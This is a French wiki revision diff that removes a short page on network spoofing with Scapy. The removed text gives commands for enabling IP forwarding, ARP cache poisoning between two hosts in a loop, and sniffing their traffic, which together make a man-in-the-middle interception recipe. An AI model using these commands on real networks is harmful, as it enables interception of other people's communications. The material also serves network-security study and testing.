python:scapy:network_spoofing

Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

Prochaine révision
Révision précédente
python:scapy:network_spoofing [2018/10/16 23:02] – créée phswpython:scapy:network_spoofing [2024/07/27 18:15] (Version actuelle) – removing (moved to scapy page) phsw
Ligne 1: Ligne 1:
-====== Spoofer le réseau avec Scapy ====== 
  
-Récupérer le trafic entre les machines A et B: 
- 
-  - Activer le routage des paquets: <code bash>sudo sysctl net/ipv4/ip_forward=1</code> 
-  - Adapter le parefeu (pas de règles bizarres) 
-  - Cache-poisoning des tables ARP de A et B: <code python> 
-sendp(Ether() / ARP(op="is-at", psrc="<ipA>", pdst="<ipB>"), inter=RandNum(10,40), loop=1) 
-</code>L'intervalle de temps varie entre 10 et 40 secondes (pas obligatoire), s'exécute en boucle. Faire la même chose en inversant les deux IP. 
-  - Sniffer le réseau:<code python>pkts = sniff(filter="host <ipA> or host <ipB>", prn=lambda p: p.summary)</code> 
- 
- 
-Astuce: pour éviter de lancer deux instances de Scapy pour corrompre les tables: 
-<code python> 
-pkts = [ARP(op="is-at", psrc="<ipA>", pdst="<ipB>"), ARP(op="is-at", psrc="<ipB>", pdst="<ipA>")] 
-srploop(pkts, inter=1, store=False) 
-</code> 
-''store=False'' permet d'éviter de stocker en mémoire les paquets, pour préserver la RAM. 
  • python/scapy/network_spoofing.1539723735.txt.gz
  • Dernière modification : 2021/04/04 17:01
  • (modification externe)